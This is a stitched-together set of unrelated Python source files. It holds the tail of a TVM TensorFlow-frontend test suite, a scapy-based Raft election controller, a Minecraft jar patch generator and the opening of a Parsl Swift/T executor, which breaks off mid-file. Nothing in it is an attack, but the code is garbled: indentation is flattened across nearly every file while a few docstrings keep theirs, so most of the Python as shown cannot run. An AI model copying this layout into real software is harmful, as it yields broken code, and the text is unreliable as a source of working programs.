with ops.device("/job:localhost/replica:0/task:0/device:CPU:3"):
z = tf.add(x, y)
return z
op = gen_functional_ops.StatefulPartitionedCall(
args=[tf.constant(10.5), tf.constant(20.4)], Tout=[dtypes.float32], f=fun3
)
with pytest.raises(Exception) as execinfo:
compare_tf_with_tvm(
[], [], "StatefulPartitionedCall:0", mode="vm", init_global_variables=True
)
assert execinfo.value.args[0].startswith("Found inconsistent Device assignment")
def _test_spop_resource_variables():
# This test case is to test that TVM rejects any graph containing
# resource variables with StatefulPartitionedOp.
tf.reset_default_graph()
with tf.Graph().as_default():
const1 = tf.constant(10)
const2 = tf.constant(20)
var1 = tf.Variable(const1, dtype=tf.int32, use_resource=True)
var2 = tf.Variable(const2, dtype=tf.int32, use_resource=True)
@tf.function
def resourceVariablesTest(x, y):
return tf.multiply(x, y)
op = resourceVariablesTest(var1, var2)
with pytest.raises(Exception) as execinfo:
compare_tf_with_tvm(
[], [], "StatefulPartitionedCall:0", mode="vm", init_global_variables=True
)
assert execinfo.value.args[0].startswith("Graph is not frozen." " Provide a frozen graph")
def test_forward_spop():
_test_spop_stateful()
_test_spop_device_assignment()
# tensorflow version upgrade support
# This test is expected to fail in TF version >= 2.6
# as the generated graph will be considered frozen, hence
# not passing the criteria for the test below.
if tf.__version__ < LooseVersion("2.6.1"):
_test_spop_resource_variables()
# Placeholder test cases
_test_spop_placeholder_without_shape_info()
_test_spop_placeholder_with_shape_and_default_value()
_test_spop_placeholder_numpy_arange_feed()
_test_spop_placeholder_numpy_array_feed()
# Function Invocation test cases
_test_spop_function_invocation_basic()
_test_spop_function_invocation_nested()
_test_spop_function_invocation_no_autograph()
_test_spop_function_invocation_defun()
# Test cases for various other TF constructs
_test_spop_arithmetic()
_test_spop_control_flow()
_test_spop_variables()
_test_spop_constants()
#######################################################################
# Dynamic input shape
# -------------------
def test_forward_dynamic_input_shape():
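    """test a graph whose input placeholder has a dynamic (None) shape"""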
tf.reset_default_graph()
with tf.Graph().as_default():
data = tf.placeholder(tf.float32, name="data", shape=(None,))
out = data + 1
np_data = np.random.uniform(size=(2,)).astype("float32")
out_name = "add"
with tf.Session() as sess:
graph_def = tf_testing.AddShapesToGraphDef(sess, out_name)
tf_output = run_tf_graph(sess, np_data, "data:0", ["{}:0".format(out_name)])
# TODO(kevinthesun): enable gpu test when VM heterogeneous execution is ready.
for device in ["llvm"]:
dev = tvm.device(device, 0)
if not tvm.testing.device_enabled(device):
print("Skip because %s is not enabled" % device)
continue
tvm_output = run_tvm_graph(
graph_def,
np_data,
["data"],
1,
target=device,
layout="NCHW",
out_names=[out_name],
mode="vm",
ignore_in_shape=True,
)
tvm.testing.assert_allclose(tvm_output[0], tf_output[0], rtol=1e-5, atol=1e-5)
def test_forward_dynamic_rnn_lstmblockcell():
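    """test dynamic_rnn built from stacked LSTMBlockCells (runs only on TF 1.x)"""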
if package_version.parse(tf.VERSION) >= package_version.parse("2.0.0"):
return
total_series_length = 50000
truncated_backprop_length = 15
state_size = 4
echo_step = 3
batch_size = 5
num_layers = 5
def generateData():
x = np.array(np.random.choice(2, total_series_length, p=[0.5, 0.5]))
y = np.roll(x, echo_step)
y[0:echo_step] = 0
x = x.reshape((batch_size, -1)) # The first index changing slowest, subseries as rows
y = y.reshape((batch_size, -1))
return (x, y)
batchX_placeholder = tf.placeholder(tf.float32, [batch_size, truncated_backprop_length])
init_state = tf.placeholder(tf.float32, [num_layers, 2, batch_size, state_size])
state_per_layer_list = tf.unstack(init_state, axis=0)
rnn_tuple_state = tuple(
[
tf.nn.rnn_cell.LSTMStateTuple(
state_per_layer_list[idx][0], state_per_layer_list[idx][1]
)
for idx in range(num_layers)
]
)
# Forward passes
def lstm_cell():
return tensorflow.contrib.rnn.LSTMBlockCell(state_size)
cell = tf.nn.rnn_cell.MultiRNNCell(
[lstm_cell() for _ in range(num_layers)], state_is_tuple=True
)
states_series, current_state = tf.nn.dynamic_rnn(
cell, tf.expand_dims(batchX_placeholder, -1), initial_state=rnn_tuple_state
)
with tf.Session() as sess:
sess.run(tf.global_variables_initializer())
x, y = generateData()
_current_state = np.zeros((num_layers, 2, batch_size, state_size))
start_idx = 0
end_idx = start_idx + truncated_backprop_length
batchX = x[:, start_idx:end_idx]
# Save current state for TVM
current_state_tvm = _current_state
_current_state, _states_series = sess.run(
[current_state, states_series],
feed_dict={batchX_placeholder: batchX, init_state: _current_state},
)
# Organize results and corresponding names
tf_output = [_states_series]
for c in _current_state:
tf_output.append(c.c)
tf_output.append(c.h)
name = [states_series.name.split(":")[0]]
for t in current_state:
name.append(t.c.name.split(":")[0])
name.append(t.h.name.split(":")[0])
graph_def = sess.graph.as_graph_def(add_shapes=True)
final_graph_def = graph_util.convert_variables_to_constants(sess, graph_def, name)
tvm_output = run_tvm_graph(
final_graph_def,
[batchX.astype("float32"), current_state_tvm.astype("float32")],
["Placeholder", "Placeholder_1"],
out_names=name,
num_output=len(name),
mode="vm",
disabled_pass=["FoldScaleAxis"],
)
# Compare result
for i in range(len(tf_output)):
tvm.testing.assert_allclose(tf_output[i], tvm_output[i], atol=1e-5, rtol=1e-5)
#######################################################################
# Unique
# ------------
def _test_unique(n, dtype, is_dyn):
tf.reset_default_graph()
np_data = np.random.randint(100, size=n).astype(dtype)
with tf.Graph().as_default():
if is_dyn:
in_data = tf.placeholder(dtype, [n], name="in_data")
else:
in_data = tf.constant(np_data, dtype, name="in_data")
tf.unique(in_data)
if is_dyn:
compare_tf_with_tvm(np_data, "in_data:0", ["Unique:0", "Unique:1"], mode="vm")
else:
compare_tf_with_tvm(np_data, "", ["Unique:0", "Unique:1"], mode="vm")
def test_forward_unique():
"""test Unique"""
for dtype in ["int32", "int64"]:
for is_dyn in [False, True]:
_test_unique(50, dtype, is_dyn)
_test_unique(100, dtype, is_dyn)
#######################################################################
# Unique with counts
# ------------
def _test_unique_with_counts(n, dtype, is_dyn):
tf.reset_default_graph()
np_data = np.random.randint(100, size=n).astype(dtype)
with tf.Graph().as_default():
if is_dyn:
in_data = tf.placeholder(dtype, [n], name="in_data")
else:
in_data = tf.constant(np_data, dtype, name="in_data")
tf.unique_with_counts(in_data)
if is_dyn:
compare_tf_with_tvm(
np_data,
"in_data:0",
["UniqueWithCounts:0", "UniqueWithCounts:1", "UniqueWithCounts:2"],
mode="vm",
)
else:
compare_tf_with_tvm(
np_data,
"",
["UniqueWithCounts:0", "UniqueWithCounts:1", "UniqueWithCounts:2"],
mode="vm",
)
def test_forward_unique_with_counts():
"""test UniqueWithCounts"""
for dtype in ["int32", "int64"]:
for is_dyn in [False, True]:
_test_unique_with_counts(10, dtype, is_dyn)
_test_unique_with_counts(20, dtype, is_dyn)
#######################################################################
# check graph ir for nn.moments
# ------------
def test_moments():
g = tf.Graph()
shape = [4, 176, 8, 8]
dtype = "float32"
with g.as_default():
A = tf.placeholder(shape=shape, dtype=dtype, name="A")
B = tf.placeholder(shape=shape, dtype=dtype, name="B")
mean, variance = tf.nn.moments(A, [1], keep_dims=True)
normalised_input = (A - mean) / tf.sqrt(variance + 0.0005)
mod, _ = from_tensorflow(g.as_graph_def(add_shapes=True))
program = """
def @main(%A: Tensor[(4, 176, 8, 8), float32]) {
%527 = mean(%A, axis=[1], keepdims=True) /* moments/mean */;
%528 = subtract(%A, %527) /* sub */;
%529 = subtract(%A, %527);
%530 = multiply(%529, %529) /* moments/SquaredDifference */;
%531 = mean(%530, axis=[1], keepdims=True) /* moments/variance */;
%532 = add(%531, 0.0005f) /* add */;
%533 = sqrt(%532) /* Sqrt */;
divide(%528, %533) /* truediv */
}
"""
mod_golden = tvm.parser.parse('#[version = "0.0.5"]\n' + program)
tvm.ir.assert_structural_equal(mod["main"].body, mod_golden["main"].body, map_free_vars=True)
#######################################################################
# invert_permutation
# --------------------
def test_invert_permutation():
"""test InvertPermutation"""
tf.reset_default_graph()
input_shape = [6]
x = np.array([3, 4, 0, 2, 1, 5]).astype("int32")
with tf.Graph().as_default():
in_data = tf.placeholder(shape=input_shape, dtype="int32")
tf.invert_permutation(in_data)
out_name = "InvertPermutation:0"
compare_tf_with_tvm(x, "Placeholder:0", out_name, no_gpu=False)
if __name__ == "__main__":
pytest.main([__file__])
|
Controller.py
|
from scapy.all import *
from packet_sender import Raft, send_no_reply, COMMANDS
from threading import Event
from utils.Switch_Register_Manager import CustomConsole
from timeit import default_timer as timer
import argparse
RANDOM_TIMEOUT = {'min': 150, 'max': 300} # min max values in ms
RAFT_HEARTBEAT_RATE = 50
STATUSES = {'follower': 0, 'candidate': 1, 'leader': 2}
RAFT_PROTOCOL_DSTPORT = 0x9998
IP_MULTICAST_ADDRESS = '224.0.255.255'
#logging_format = '%(asctime)-15s [%(threadName)s] - [%(funcName)s] %(message)s'
logging_format = ''
level = logging.ERROR # Change to Error or something like that to silence the log to file!
logging.basicConfig(filename='./logs/controller.log', level=level, format=logging_format)
logger = logging.getLogger()
class Controller(object):
def __init__(self, controller_ip):
self.status = STATUSES['follower']
self.timeout_thread = None
self.controller_ip = controller_ip
        self.nodeID = args.ID  # ID of the Raft node this controller manages
self.term = 0
self.logIndex = 0
self.counter_new_request = 0
self.counter_rejected_requests = 0
self.sniffer = AsyncSniffer(
iface=conf.iface,
lfilter=is_ingoing_raft_packet,
prn=lambda _pkt: self.handle_packet(_pkt)
)
self.sniffer.start()
self.heartbeat_loop_thread = threading.Thread(target=self.heartbeats_loop)
self.heartbeat_loop_thread.start()
self.time = None
self.stop_flag = Event()
if self.nodeID == 1:
self.failure_thread = threading.Thread(target=self.emulate_failure)
self.failure_thread.start()
self.init_timeout() # starting as follower, we need to start the timeout
def handle_packet(self, packet):
if packet[Raft].messageType == COMMANDS['RequestVote'] and packet[Raft].sourceID == self.nodeID:
self.status = STATUSES['candidate']
self.time = timer()
print('vote request: -> state: {};'.format(self.status))
if packet[Raft].messageType == COMMANDS['HeartBeatRequest'] and packet[Raft].sourceID == self.nodeID: # received the heartbeat from node -> node has won the election
if self.status == STATUSES['candidate']:
print('won election -> status = leader')
print('time elapsed (in ms): {}'.format((timer() - self.time)*1000))
logger.debug('[nodeID: {}] won election: {}'.format(self.nodeID, timer()))
print('election absolute time: {}'.format(timer()))
self.status = STATUSES['leader']
self.term = packet[Raft].currentTerm
self.logIndex = packet[Raft].logIndex
if packet[Raft].messageType == COMMANDS['HeartBeatRequest'] and not packet[Raft].sourceID == self.nodeID:
self.status = STATUSES['follower']
self.term = packet[Raft].currentTerm
self.logIndex = packet[Raft].logIndex
self.init_timeout()
if packet[Raft].messageType == COMMANDS['HeartBeatResponse']: # received a cloned heartbeat response from node -> reset timeout
#print('resetting timeout; response to destinationID: {}'.format(packet[Raft].destinationID))
#print('state : {}'.format(self.status))
self.term = packet[Raft].currentTerm
if self.status == STATUSES['leader']:
print('stepping down as leader.')
self.status = STATUSES['follower']
self.init_timeout()
if packet[Raft].messageType == COMMANDS['AppendEntriesReply']: # received a cloned AppendEntries response from node -> reset timeout
#print('resetting timeout; AppendEntries from: {}'.format(packet[Raft].destinationID))
#print('state : {}'.format(self.status))
self.term = packet[Raft].currentTerm
self.logIndex = packet[Raft].logIndex
self.init_timeout()
# if packet[Raft].messageType == COMMANDS['AppendEntries']:
# print('starting Transaction: {}'.format(time.time()))
if packet[Raft].messageType == COMMANDS['Redirect'] and self.status == STATUSES['leader']:
# received a redirected New Request from a client
# new request can be made only by controllers
self.counter_new_request += 1
packet[Raft].messageType = COMMANDS['NewRequest']
logger.debug('[nodeID: {}] redirected New Request received; total: {}; time: {}'.format(
self.nodeID,
self.counter_new_request,
timer())
)
#print('New Request received; total: {}; time: {}'.format(self.counter_new_request, time.time()))
packet[Raft].sourceID = 0x0
packet[Raft].destinationID = self.nodeID
            packet[IP].src = args.source
#packet[Raft].show()
send_no_reply(packet)
#if (self.counter_new_request % 1000 == 0) and self.nodeID == 1: # emulating failure self.sniffer.start():
#self.emulate_failure()
if packet[Raft].messageType == COMMANDS['RejectNewRequest']:
self.counter_rejected_requests += 1
logger.debug('[nodeID: {}] New request rejected; total {}'.format(self.nodeID, self.counter_rejected_requests))
#print('New request rejected; total {}'.format(self.counter_rejected_requests))
#print('state : {}'.format(self.status))
# if packet[Raft].messageType == COMMANDS['CommitValue']:
# print('Transaction complete. time: {}'.format(time.time()))
#print('send confirmation to Client')
# if packet[Raft].messageType == COMMANDS['RetrieveLog']:
# print('retrieved value: {} at index: {}'.format(packet[Raft].data, packet[Raft].logIndex))
#logger.debug(packet.sprintf())
#packet[Raft].show()
def emulate_failure(self):
#cmd = CustomConsole(9090)
time.sleep(10)
#cmd.communicate("register_write roleRegister 0 0")
logger.debug('[nodeID: {}] failure time: {}'.format(self.nodeID, timer()))
print('failure time: {}'.format(timer()))
self.sniffer.stop(join=False)
self.stop_flag.set()
time.sleep(5)
self.sniffer.start()
self.stop_flag.clear()
# import os
# print('emulating failure after {} New Req>
# os._exit(0)
def raft_timeout(self):
return random.randrange(RANDOM_TIMEOUT['min'], RANDOM_TIMEOUT['max']) / 1000
def reset_timeout(self):
self.election_time = time.time() + self.raft_timeout()
def init_timeout(self):
self.reset_timeout()
# safety guarantee, timeout thread may expire after election
if self.timeout_thread and self.timeout_thread.is_alive():
return
self.timeout_thread = threading.Thread(target=self.timeout_loop)
self.timeout_thread.start()
def heartbeats_loop(self):
rate = RAFT_HEARTBEAT_RATE / 1000
while True: # todo find a way to block this thread in a more clever way
if self.status == STATUSES['leader'] and not self.stop_flag.is_set():
#print('sending StartHeartbeat')
self.send_heartbeat_request()
time.sleep(rate)
else:
time.sleep(rate)
return
# the timeout function
def timeout_loop(self):
# only stop timeout thread when winning the election
while self.status != STATUSES['leader']:
delta = self.election_time - time.time()
if delta < 0:
self.start_election()
self.reset_timeout()
else:
time.sleep(delta)
return
def start_election(self):
print('starting election')
#logger.debug("{} starting election; status: {}, term:{}".format(self.controller_ip, self.status, self.term))
self.term += 1
start_election_message = Raft.raft_packet(
sourceID=0x0,
destinationID=self.nodeID,
data=0x0,
logIndex=self.logIndex,
srcIP=args.source,
dstIP=IP_MULTICAST_ADDRESS,
currentTerm=self.term,
messageType=COMMANDS['Timeout']
)
send_no_reply(start_election_message)
def send_heartbeat_request(self):
#print("Sending heartbeat request")
#logger.debug("Starting HEARTBEATS")
heartbeat = Raft.raft_packet(
sourceID=0x0,
destinationID=self.nodeID,
data=0x0,
logIndex=self.logIndex,
srcIP=args.source,
dstIP=IP_MULTICAST_ADDRESS,
currentTerm=self.term,
messageType=COMMANDS['StartHeartbeat']
)
send_no_reply(heartbeat)
# def main_handle_packet(packet):
# packet[Raft].show()
def is_ingoing_raft_packet(_packet):
    return (
        _packet.haslayer(IP)
        and not _packet[IP].proto == 'icmp'
        and _packet.haslayer(UDP)
        and _packet[UDP].dport == RAFT_PROTOCOL_DSTPORT
        and _packet.haslayer(Raft)
        and _packet[Raft].sourceID != 0x0
    )
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Raft Packet Sender')
parser.add_argument(
'-s', '--source', help='select the node IP (default=10.0.1.1)', default='10.0.1.1', required=False,
type=str
)
parser.add_argument(
'-i', '--ID', help='ID of raft node', default='1', required=False,
type=int
)
args = parser.parse_args()
controller = Controller(args.source)
print('starting controller')
while True: # useless, only to keep the main thread alive
time.sleep(10)
|
patchgen.py
|
#!/usr/bin/env python
# vim: noet
# ---------------------------------------------------------------------------
# Copyright (C) 2013 Andrew Okin
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
# ---------------------------------------------------------------------------
# Future
from __future__ import print_function, unicode_literals, absolute_import
# IMPORTS
import json
import md5
import re
import urllib2
import requests
from urlparse import urljoin
import argparse
import os
import sys
import shutil
from Queue import Queue
from threading import Thread
import bsdiff4
#####################
# UTILITY FUNCTIONS #
#####################
def determine_latest_version(mojang_versions_url):
"""Reads from Mojang's version list and returns the name of the latest version of Minecraft."""
response = urllib2.urlopen(urljoin(mojang_versions_url, "versions.json"))
json_str = response.read()
data = json.loads(json_str)
return data["latest"]["release"]
def is_valid_md5(md5str):
    return re.match(r"^[a-fA-F\d]{32}$", md5str) is not None
def get_index_mcversion(index_path):
"""
read the minecraft version from the index file.
return <index mcversion or None>
"""
if os.path.exists(index_path):
index = json.load(open(index_path, "r"))
return index["mcversion"]
return None
def download_version(mojang_versions_url, mcversion, dest, max_tries = 3):
"""Downloads the jar file with the given version number from Mojang's download site to the given output file."""
pass
def generate_patch(version, old_jar, patch, latest_jar):
"""
Generates a diff between latest_jar and old_jar in patch
"""
bsdiff4.file_diff(latest_jar, old_jar, patch)
result = {"name": version}
with open(old_jar, "rb") as fp:
result["md5"] = md5.new(fp.read()).hexdigest()
return result
#########
# TASKS #
#########
def check_new_jars(jar_dir_path, cache_file_path, mojang_versions_url, verbose = False):
"""
Checks to see if a new jar file should be downloaded.
    If verbose is true, the function will print a bunch of information about what's going on, primarily the reasons why it has determined that there's a new version.
    Returns the version name of the new jar if there is one; otherwise, returns an empty string.
"""
# This is probably a monstrosity, but I don't want to have to type this crap out 20 times...
def print_new_version_reason(msg):
print("Assuming there's a new version because %s" % msg)
# First, get the version name of the latest minecraft.jar
latest_version_name = determine_latest_version(mojang_versions_url)
# Next, we need to make sure the cache file exists. If it doesn't, assume there's a new version.
if not os.path.exists(cache_file_path):
if verbose: print_new_version_reason("the cache file doesn't exist.")
return latest_version_name
# Now we load the cache file.
cache_info = {}
    with open(cache_file_path, "r") as cache_file: cache_info = json.load(cache_file) # TODO: Handle syntax errors
# Ensure the cache is valid.
if not "mcversion" in cache_info or not "md5sum" in cache_info:
if verbose: print_new_version_reason("the cache file is missing fields.")
return latest_version_name
# Make sure the cache file's mcversion name matches the latest version name.
if cache_info["mcversion"] != latest_version_name:
if verbose: print_new_version_reason("the mcversion specified in the cache file doesn't match the latest version.")
return latest_version_name
# Determine the path to the latest jar
latest_jar_path = os.path.join(jar_dir_path, latest_version_name + ".jar")
# Make sure we have a jar file in our jars folder matching this version name.
if not os.path.exists(latest_jar_path):
if verbose: print_new_version_reason("no jar file found matching the mcversion specified in the cache file.")
return latest_version_name
# Get the ETag for the latest jar file.
req = requests.head(mojang_versions_url + "{0}/{0}.jar".format(latest_version_name))
req.raise_for_status()
etag = req.headers['ETag'][1:-1]
# Make sure the ETag is a valid MD5sum. If not, error.
if not is_valid_md5(etag):
print("ETag %s is not a valid MD5sum. Aborting!" % etag)
if verbose: print_new_version_reason("the ETag received from the version list is not a valid MD5sum.")
return "" # TODO: Should return an error here.
# Check if the ETag matches the MD5sum field in the cache file.
if etag != cache_info["md5sum"]:
if verbose: print_new_version_reason("the ETag on the version list (%s) doesn't match the one in the cache file (%s)." %
(etag, cache_info["md5sum"]))
return latest_version_name
# Next we calculate the MD5sum of the already downloaded file in our jars folder and make sure it matches too.
jar_md5 = md5.new()
with open(latest_jar_path, "rb") as jar: jar_md5.update(jar.read())
if etag != jar_md5.hexdigest():
if verbose: print_new_version_reason("the MD5sum of the jar file doesn't match the ETag or the one in the cache file.")
return latest_version_name
# Now that all of these checks have passed, we can be almost absolutely sure that the version we have in the jars folder is actually the version we want. Return empty string, indicating that we don't need to download anything.
return ""
def download_latest_jar(latest_version_name, cache_file_path, mojang_versions_url,
dest, max_tries = 3, show_progress_indicator = False):
"""
Downloads the latest minecraft.jar from Mojang's version list site and writes info about it to the cache file.
latest_version_name specifies the version name for the minecraft.jar that should be downloaded as the latest version.
    Returns 0 if successful, otherwise a positive error code.
"""
try_count = 0
jar_md5 = None
# First, download the file and make sure it's valid.
while try_count < max_tries:
# Open URL and file streams for reading / writing.
response = urllib2.urlopen(urljoin(mojang_versions_url, "{0}/{0}.jar".format(latest_version_name)))
outfile = open(dest, "wb")
# Get header info.
info = response.info()
# Get the ETag field from the header.
etag = (info.getheaders("ETag")[0])[1:-1]
size = int(info.getheaders("Content-Length")[0])
print("Downloading %i bytes" % size)
# Ensure that the etag is a valid MD5
if not is_valid_md5(etag):
print("ETag %s is not a valid MD5. Aborting!" % etag)
return 1
# Create a new MD5 object for the data we're downloading.
md5obj = md5.new()
# Download data and pass it to the MD5 object as we download it.
downloaded = 0
block_sz = 8192
while True:
buf = response.read(block_sz)
if not buf:
break
downloaded += len(buf)
outfile.write(buf)
md5obj.update(buf)
# Show a progress indicator if it's enabled.
if show_progress_indicator:
pcnt = int((float(downloaded) / float(size)) * 100)
print("\rDownloading jar file - %3d%% [%7d/%7d bytes]" % (pcnt, downloaded, size), end="")
sys.stdout.write("\n")
sys.stdout.flush()
outfile.close()
        jar_md5 = md5obj.hexdigest()
        try_count += 1
        if jar_md5 == etag:
            # If the download succeeded, break the loop.
            break
        elif try_count < max_tries:
            # Otherwise, print a warning and try again.
            print("MD5 of downloaded data (%s) did not match the ETag (%s). Trying again." % (jar_md5, etag))
            continue
        else:
            # If we've tried too many times, give up.
            print("MD5 of downloaded data (%s) did not match the ETag (%s). Giving up after %d tries." % (jar_md5, etag, try_count))
            return 1
# Now that we've downloaded the file, we need to store the information in the cache file.
# Luckily, Python is fucking awesome.
with open(cache_file_path, "w") as cache_file:
json.dump({ "mcversion": latest_version_name, "md5sum": jar_md5 }, cache_file)
return 0
def generate_patches(worker_threads, jar_dir_path, output_dir_path, index_file_name, latest_mc_version):
"""
Generates patches.
worker_threads specifies how many bsdiff threads to run at once.
latest_mc_version specifies the version name of the latest Minecraft version.
    Returns 0 if successful, otherwise a positive error code.
"""
if not os.path.exists(jar_dir_path):
print("No jars directory found at %s" % jar_dir_path)
return 2
if os.path.exists(output_dir_path):
shutil.rmtree(output_dir_path)
os.mkdir(output_dir_path)
index = {
"mcversion": latest_mc_version,
"versions": [],
"listversion": 1,
}
latest_jar_path = os.path.join(jar_dir_path, "%s.jar" % latest_mc_version)
# Load all the patches into a queue.
patch_queue = Queue()
for jarfile in os.listdir(jar_dir_path):
fname, ext = os.path.splitext(os.path.basename(jarfile))
if ext != ".jar":
print("Skipping %s because it doesn't look like a jar file." % jarfile)
continue
patch_queue.put(os.path.join(jar_dir_path, jarfile))
# Thread function for patch generation workers.
def patchgen_worker():
while not patch_queue.empty():
jarfile = patch_queue.get()
fname, ext = os.path.splitext(os.path.basename(jarfile))
print("Generating patch for %s" % fname)
index["versions"].append(generate_patch(fname, jarfile,
os.path.join(output_dir_path, "%s.patch" % fname), latest_jar_path))
patch_queue.task_done()
for i in range(worker_threads):
t = Thread(target = patchgen_worker)
t.daemon = True
t.start()
patch_queue.join()
# Dump the index to output
print("Writing Index...")
with open(index_file_name, "w") as index_file:
json.dump(index, index_file)
return 0
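# The loop above follows a simple fan-out pattern: fill a Queue, start daemon
# worker Threads that drain it, then block on join(). The stand-alone sketch
# below illustrates the same pattern in isolation; the _demo_* names are
# illustrative assumptions and are not used by the rest of this script.
def _demo_worker_pool(items, handler, worker_threads = 2):
    work_queue = Queue()
    for item in items:
        work_queue.put(item)
    def worker():
        # Mirrors patchgen_worker above: drain the queue until it is empty.
        while not work_queue.empty():
            handler(work_queue.get())
            work_queue.task_done()
    for _ in range(worker_threads):
        t = Thread(target = worker)
        t.daemon = True
        t.start()
    work_queue.join()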
def main(argv):
""" Main function """
parser = argparse.ArgumentParser(prog=argv[0], description="MCRewind patchserver generator")
parser.add_argument("-f", "--force", default=False, action="store_true",
help="Force patch generation")
parser.add_argument("-j", "--threads", default=1, type=int,
help="Anmount of worker threads [%(default)s]", metavar="T")
parser.add_argument("-a", "--mojang-versions", default="http://s3.amazonaws.com/Minecraft.Download/versions/",
help="The url to Mojang's versions.json", metavar="URL")
parser.add_argument("-n", "--offline", default=False, action="store_true",
help="Don't check for a new minecraft version (implies -f)")
parser.add_argument("-v", "--verbose", default=False, action="store_true",
help="Enables verbose output.")
p_dirs = parser.add_argument_group("Paths")
p_dirs.add_argument("-o", "--output-dir", default="patches",
help="The output directory [%(default)s]", metavar="DIR")
p_dirs.add_argument("-i", "--jar-dir", default="jars",
help="The directory containing the .jar files [%(default)s]", metavar="DIR")
p_dirs.add_argument("-x", "--index-file", default="index.json",
help="Path specifying where the index file should be generated [%(default)s]", metavar="INDEX")
p_dirs.add_argument("-c", "--cache-file", default="cache.json",
help="Path specifying where the cache file should be put [%(default)s]", metavar="CACHE")
args = parser.parse_args(argv[1:])
print("MCRewind Patch Generator v1")
print("Force generate patches? %s" % str(args.force))
print("Worker Threads: %i" % args.threads)
print("Mojang versions URL: %s" % args.mojang_versions)
print("Offline mode? %s" % str(args.offline))
print("Jar file directory: %s" % args.jar_dir)
print("Output directory: %s" % args.output_dir)
print("Index file path: %s" % args.index_file)
print("Cache file path: %s" % args.cache_file)
print("")
mcversion = get_index_mcversion(args.index_file)
new_version = None
if not args.offline:
print("Checking for a new minecraft version...")
# Call check_new_jars to see if there's a new version.
new_version = check_new_jars(args.jar_dir, args.cache_file, args.mojang_versions,
verbose = args.verbose)
# If there's a new version.
if new_version:
print("Found new Minecraft version: %s" % new_version)
# Download the new version.
dest = os.path.join(args.jar_dir, "%s.jar" % new_version)
retval = download_latest_jar(new_version, args.cache_file, args.mojang_versions, dest,
show_progress_indicator = True)
if retval > 0:
print("Error getting latest jar. Aborting.")
return retval
# _, new_version = check_new_version(mcversion, args.mojang_versions)
# if new_version:
# print("New Minecraft version found: %s" % new_version)
# dest = os.path.join(args.jar_dir, "%s.jar" % new_version)
# if os.path.exists(dest):
# print("Found new version in JAR directory.")
# else:
# download_version(args.mojang_versions, new_version, dest)
else:
print("Skipping update check.")
if not (new_version or args.force or args.offline):
print("No new version found, not doing anything.")
return 0
# Yes, this else is unnecessary, but it makes it easier to tell what's going on here.
else:
if not mcversion and not new_version:
print("Can't generate patches because no cache or index file could be found.")
return 1
print("Generating patches...")
result = generate_patches(args.threads, args.jar_dir, args.output_dir,
args.index_file, (new_version if new_version else mcversion))
if result != 0:
return result
print("Done.")
return 0
if __name__ == "__main__":
sys.exit(main(sys.argv))
|
swift_t.py
|
"""Sample Executor for integration with SwiftT.
This follows the model used by `EMEWS <http://www.mcs.anl.gov/~wozniak/papers/Cancer2_2016.pdf>`_
to some extent.
"""
from concurrent.futures import Future
import logging
import uuid
import threading
import queue
import multiprocessing as mp
from ipyparallel.serialize import pack_apply_message, unpack_apply_message
from ipyparallel.serialize import serialize_object, deserialize_object
from parsl.executors.base import ParslExecutor
logger = logging.getLogger(__name__)
BUFFER_THRESHOLD = 1024 * 1024
ITEM_THRESHOLD = 1024
def runner(incoming_q, outgoing_q):
"""This is a function that mocks the Swift-T side.
    It listens on the incoming_q for tasks and posts results on the outgoing_q.
Args:
- incoming_q (Queue object) : The queue to listen on
- outgoing_q (Queue object) : Queue to post results on
The messages posted on the incoming_q will be of the form :
.. code:: python
{
"task_id" : <uuid.uuid4 string>,
"buffer" : serialized buffer containing the fn, args and kwargs
}
If ``None`` is received, the runner will exit.
Response messages should be of the form:
.. code:: python
{
"task_id" : <uuid.uuid4 string>,
"result" : serialized buffer containing result
"exception" : serialized exception object
}
On exiting the runner will post ``None`` to the outgoing_q
"""
logger.debug("[RUNNER] Starting")
def execute_task(bufs):
"""Deserialize the buffer and execute the task.
Returns the serialized result or exception.
"""
user_ns = locals()
user_ns.update({'__builtins__': __builtins__})
f, args, kwargs = unpack_apply_message(bufs, user_ns, copy=False)
fname = getattr(f, '__name__', 'f')
prefix = "parsl_"
fname = prefix + "f"
argname = prefix + "args"
kwargname = prefix + "kwargs"
resultname = prefix + "result"
user_ns.update({fname: f,
argname: args,
kwargname: kwargs,
resultname: resultname})
code = "{0} = {1}(*{2}, **{3})".format(resultname, fname,
argname, kwargname)
try:
logger.debug("[RUNNER] Executing: {0}".format(code))
exec(code, user_ns, user_ns)
except Exception as e:
logger.warning("Caught exception; will raise it: {}".format(e))
raise e
else:
logger.debug("[RUNNER] Result: {0}".format(user_ns.get(resultname)))
return user_ns.get(resultname)
while True:
try:
# Blocking wait on the queue
msg = incoming_q.get(block=True, timeout=10)
except queue.Empty:
# Handle case where no items were in the queue
logger.debug("[RUNNER] Queue is empty")
except IOError as e:
logger.debug("[RUNNER] Broken pipe: {}".format(e))
try:
# Attempt to send a stop notification to the management thread
outgoing_q.put(None)
except Exception:
pass
break
except Exception as e:
logger.debug("[RUNNER] Caught unknown exception: {}".format(e))
else:
# Handle received message
if not msg:
# Empty message is a die request
logger.debug("[RUNNER] Received exit request")
outgoing_q.put(None)
break
else:
# Received a valid message, handle it
logger.debug("[RUNNER] Got a valid task with ID {}".format(msg["task_id"]))
try:
response_obj = execute_task(msg['buffer'])
response = {"task_id": msg["task_id"],
"result": serialize_object(response_obj)}
logger.debug("[RUNNER] Returing result: {}".format(
deserialize_object(response["result"])))
except Exception as e:
logger.debug("[RUNNER] Caught task exception: {}".format(e))
response = {"task_id": msg["task_id"],
"exception": serialize_object(e)}
outgoing_q.put(response)
logger.debug("[RUNNER] Terminating")
class TurbineExecutor(ParslExecutor):
"""The Turbine executor.
